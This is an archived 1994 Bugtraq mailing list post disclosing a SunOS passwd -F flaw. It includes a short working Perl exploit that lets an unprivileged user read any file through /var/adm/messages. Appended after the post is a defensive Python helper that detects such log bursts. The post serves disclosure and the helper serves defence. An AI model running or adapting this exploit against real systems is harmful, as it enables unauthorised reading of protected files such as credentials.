Bugtraq mailing list archives

passwd -F


From: steve () cati csufresno edu (Steve Mitchell)
Date: Tue, 10 May 94 17:19:53 PDT


FYI, this vulnerability exists on 4.1.3_U1.  I do not know how
widespread knowledge of this vulnerability is, but I have seen Suns
running a modified passwd program that has "-F option disabled" (according
to the message output by passwd).  So somebody out there has known about
it for a while.

The following trivial perl script allows non-privileged users to 
easily read any file on the system.

--steve

-- 
Steve Mitchell      KD6BET       TIP#168       steve_mitchell () csufresno edu
"STUFF: Anything that can be used for homebrewing."  "JUNK: Everything else
you thought could be used for homebrewing, but can't."    --Steve Casselman


#!/usr/local/bin/perl
#
# Author disclaims all responsibility for misuse of this script
#  --sjm 5/10/94

$file = shift || die "Usage: $0 filename\n";

open(A,"</var/adm/messages");

@statf = stat(A);

system("/usr/bin/passwd -F $file 1>&2 2>/dev/null");

seek(A,$statf[7],0);

while(<A>) {
        next if !/passwd/;
        ($stuff,$line) = split(/"/,$_,2);
        print $line;
}
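
Added example, not part of the original post: a log-review helper for the defending side. It uses the same two criteria the script above keys on (the word "passwd" and a double quote) to find runs of passwd entries in /var/adm/messages that echo quoted text. The sample log, its syslog layout and the "bad entry" wording are constructed assumptions.

```python
from typing import List, NamedTuple, Optional

# Constructed sample. The syslog layout and the "bad entry" wording are
# assumptions; only the word "passwd" and the double quote that precedes
# the echoed text are taken from the script in the post.
SAMPLE_LOG = '''\
May 10 17:01:12 host1 sendmail[211]: AA00211: message queued
May 10 17:02:40 host1 passwd[402]: bad entry "first line of some file
May 10 17:02:40 host1 passwd[402]: bad entry "second line of some file
May 10 17:02:41 host1 passwd[402]: bad entry "third line of some file
May 10 17:09:03 host1 login: ROOT LOGIN console
May 10 17:30:55 host1 passwd[977]: bad entry "stray line
'''

class Burst(NamedTuple):
    first_line: int      # 1-based line number where the run starts
    echoed: List[str]    # text that followed the first double quote

def echoed_text(line: str) -> Optional[str]:
    """Return the text after the first '"' on a passwd log line, else None."""
    if "passwd" not in line or '"' not in line:
        return None
    return line.split('"', 1)[1]

def find_bursts(log: str, min_lines: int = 3) -> List[Burst]:
    """Group consecutive passwd lines that echo quoted text; keep long runs."""
    bursts: List[Burst] = []
    run: List[str] = []
    start = 0
    for num, line in enumerate(log.splitlines(), 1):
        text = echoed_text(line)
        if text is not None:
            if not run:
                start = num
            run.append(text)
            continue
        if len(run) >= min_lines:
            bursts.append(Burst(start, run))
        run = []
    if len(run) >= min_lines:        # run that reaches the end of the log
        bursts.append(Burst(start, run))
    return bursts

if __name__ == "__main__":
    for b in find_bursts(SAMPLE_LOG):
        print(f"line {b.first_line}: {len(b.echoed)} consecutive passwd entries echo quoted text")
        for text in b.echoed:
            print("    " + text)
```

A run reported here shows what text ended up in the log, which is what a responder needs in order to judge what was exposed.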


